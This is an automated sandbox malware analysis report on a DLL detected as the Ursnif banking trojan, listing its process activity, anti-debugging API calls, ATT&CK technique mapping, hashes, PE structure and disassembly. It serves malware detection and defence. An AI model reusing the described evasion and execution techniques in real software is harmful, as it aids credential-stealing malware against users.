Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E201F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6E201F6D

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E20966F mov eax, dword ptr fs:[00000030h]	0_2_6E20966F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E20966F mov eax, dword ptr fs:[00000030h]	2_2_6E20966F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 22_2_6E20966F mov eax, dword ptr fs:[00000030h]	22_2_6E20966F

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E201F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E201F6D
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1E07A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_6E1E07A7
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1E0288 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_6E1E0288
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E201F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6E201F6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E1E07A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_6E1E07A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E1E0288 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_6E1E0288
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 22_2_6E201F6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_6E201F6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 22_2_6E1E07A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	22_2_6E1E07A7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 22_2_6E1E0288 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	22_2_6E1E0288

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\WoyEsA8v7H.dll',#1	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Island	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c cd Matter m	Jump to behavior

Source: loaddll32.exe, 00000000.00000002.556995982.00000000013C0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.523374046.0000000003B80000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.599260061.0000000003290000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.535562022.0000000003290000.00000002.00000001.sdmp, rundll32.exe, 00000010.00000002.529667252.0000000003290000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.590270593.00000000038C0000.00000002.00000001.sdmp, rundll32.exe, 00000016.00000002.554215165.0000000003420000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.556995982.00000000013C0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.523374046.0000000003B80000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.599260061.0000000003290000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.535562022.0000000003290000.00000002.00000001.sdmp, rundll32.exe, 00000010.00000002.529667252.0000000003290000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.590270593.00000000038C0000.00000002.00000001.sdmp, rundll32.exe, 00000016.00000002.554215165.0000000003420000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.556995982.00000000013C0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.523374046.0000000003B80000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.599260061.0000000003290000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.535562022.0000000003290000.00000002.00000001.sdmp, rundll32.exe, 00000010.00000002.529667252.0000000003290000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.590270593.00000000038C0000.00000002.00000001.sdmp, rundll32.exe, 00000016.00000002.554215165.0000000003420000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.556995982.00000000013C0000.00000002.00000001.sdmp, rundll32.exe, 00000002.00000002.523374046.0000000003B80000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.599260061.0000000003290000.00000002.00000001.sdmp, rundll32.exe, 0000000D.00000002.535562022.0000000003290000.00000002.00000001.sdmp, rundll32.exe, 00000010.00000002.529667252.0000000003290000.00000002.00000001.sdmp, rundll32.exe, 00000015.00000002.590270593.00000000038C0000.00000002.00000001.sdmp, rundll32.exe, 00000016.00000002.554215165.0000000003420000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1E0604 cpuid

0_2_6E1E0604

Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E21E61F
Source: C:\Windows\System32\loaddll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_6E21E6EC
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E21DF65
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_6E21E518
Source: C:\Windows\System32\loaddll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_6E21DD96
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E214323
Source: C:\Windows\System32\loaddll32.exe	Code function: ___crtGetLocaleInfoEx,	0_2_6E1DF364
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E21E3EF
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E21E00E
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E21E077
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E21E112
Source: C:\Windows\System32\loaddll32.exe	Code function: EnumSystemLocalesW,	0_2_6E213952
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,	0_2_6E1DF1B7
Source: C:\Windows\System32\loaddll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_6E21E19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E21DF65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_6E21DD96
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E213952
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E21E61F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_6E21E6EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_6E21E518
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E214323
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoEx,	2_2_6E1DF364
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E21E3EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E21E00E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E21E077
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	2_2_6E21E112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	2_2_6E1DF1B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_6E21E19F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	22_2_6E21DF65
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	22_2_6E21DD96
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	22_2_6E213952
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	22_2_6E21E61F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	22_2_6E21E6EC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	22_2_6E21E518
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	22_2_6E214323
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: ___crtGetLocaleInfoEx,	22_2_6E1DF364
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	22_2_6E21E3EF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	22_2_6E21E00E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	22_2_6E21E077
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: EnumSystemLocalesW,	22_2_6E21E112
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,	22_2_6E1DF1B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	22_2_6E21E19F

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E1C9A14 GetSystemTimeAsFileTime,

0_2_6E1C9A14

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6E21877C _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_6E21877C

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: WoyEsA8v7H.dll, type: SAMPLE
Source: Yara match	File source: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.590312640.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.552879000.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.545510346.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.6e1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: WoyEsA8v7H.dll, type: SAMPLE
Source: Yara match	File source: 00000016.00000002.570061995.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.523416376.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.590312640.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.552879000.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.545510346.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0.2.loaddll32.exe.6e1a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 21.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.rundll32.exe.6e1a0000.1.unpack, type: UNPACKEDPE

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_6E1A16BC __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,		0_2_6E1A16BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 2_2_6E1A16BC __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,		2_2_6E1A16BC

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Rundll321	OS Credential Dumping	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Security Software Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Junk Data	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information2	NTDS	System Information Discovery22	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
WoyEsA8v7H.dll	58%	Virustotal		Browse
WoyEsA8v7H.dll	100%	Avira	TR/Spy.Ursnif.ozghq

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.rundll32.exe.6e1a0000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
22.2.rundll32.exe.6e1a0000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
13.2.rundll32.exe.6e1a0000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
21.2.rundll32.exe.6e1a0000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
16.2.rundll32.exe.6e1a0000.1.unpack	100%	Avira	HEUR/AGEN.1142290	Download File
0.2.loaddll32.exe.6e1a0000.0.unpack	100%	Avira	HEUR/AGEN.1142290	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	432585
Start date:	10.06.2021
Start time:	15:11:51
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 57s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	WoyEsA8v7H.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.troj.winDLL@54/0@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 18.9% (good quality ratio 17.6%) Quality average: 72.7% Quality standard deviation: 27.9%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): svchost.exe, UsoClient.exe Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.790057880506159
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	WoyEsA8v7H.dll
File size:	960000
MD5:	5a414b378a75f928594e1ddacccb40dc
SHA1:	341a60d3181bf62aa8344f4544598f7e217c1b03
SHA256:	0d4d60b0de26c90819f65b22796c1600e4942e95952c6cf19f2618b0461a441f
SHA512:	bf2fceb2ac9c61f66203cf9001ee0bd3c0979469e537f3ed14c59492c588a9e818a6b5661c0e453d8f6f6597a48352abe985b5a84c8d9f50b2f23b1925205608
SSDEEP:	24576:HQfpzjXPgfo8CJV4X+IBIJ3cazaLwj1mCG9CpNiLi:IFDg8JV4OaIRj150CpNiLi
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t...0...0...0....{i.3...9...#...b...4...b...=...b...=....{r.&...0.......b.......b...1...b.b.1...0...1...b...1...Rich0..........

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x1040052
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x1000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x5AC512FB [Wed Apr 4 18:01:31 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	7a79d10b1d4343a18a4f6e25e165b4ae

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F442499CF27h
call 00007F442499D902h
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F442499CDCFh
add esp, 0Ch
pop ebp
retn 000Ch
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 00007F442499C736h
jmp 00007F442499CF00h
mov ecx, dword ptr [ebp-14h]
xor ecx, ebp
call 00007F442499C725h
jmp 00007F442499CEEFh
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [010E506Ch]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [010E506Ch]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
inc dword ptr fs:[eax]

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0xe35b0	0x9c	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0xe364c	0x8c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xfd000	0x9d0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xfe000	0x5074	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xde820	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xde878	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8a000	0x26c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x883dc	0x88400	False	0.544624426606	data	6.71833504113	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8a000	0x5a440	0x5a600	False	0.658643456086	data	5.95813601066	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe5000	0x17ebc	0x1c00	False	0.184291294643	data	4.04646123564	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0xfd000	0x9d0	0xa00	False	0.396484375	data	3.77819611332	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xfe000	0x5074	0x5200	False	0.726133765244	data	6.63977268899	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_DIALOG	0xfd1c0	0x10e	data	English	United States
RT_DIALOG	0xfd2d0	0xc0	dBase III DBT, next free block index 4294901761	English	United States
RT_DIALOG	0xfd390	0x126	data	English	United States
RT_DIALOG	0xfd4b8	0xf0	data	English	United States
RT_DIALOG	0xfd5a8	0xba	data	English	United States
RT_DIALOG	0xfd664	0xec	data	English	United States
RT_DIALOG	0xfd750	0x124	data	English	United States
RT_MANIFEST	0xfd874	0x15a	ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
KERNEL32.dll	SetEnvironmentVariableA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetProcessHeap, CreateFileW, SetStdHandle, ReadConsoleW, WriteConsoleW, HeapSize, SetEndOfFile, SetEnvironmentVariableW, GetOEMCP, IsValidCodePage, FindNextFileW, FindNextFileA, FindFirstFileExW, FindFirstFileExA, FindClose, GetTimeZoneInformation, OutputDebugStringA, OutputDebugStringW, WaitForSingleObjectEx, CreateSemaphoreA, GetSystemTimeAsFileTime, TlsGetValue, VirtualProtectEx, TlsAlloc, GetSystemDirectoryA, GetTempPathA, Sleep, GetCommandLineA, GetModuleHandleA, InitializeCriticalSection, SetSystemPowerState, EnterCriticalSection, VirtualProtect, GetModuleFileNameA, MultiByteToWideChar, GetLastError, FormatMessageW, WideCharToMultiByte, GetStringTypeW, LeaveCriticalSection, DeleteCriticalSection, SetLastError, InitializeCriticalSectionAndSpinCount, CreateEventW, SwitchToThread, TlsSetValue, TlsFree, GetTickCount, GetModuleHandleW, GetProcAddress, EncodePointer, DecodePointer, CompareStringW, LCMapStringW, GetLocaleInfoW, GetCPInfo, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, InitializeSListHead, RtlUnwind, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, 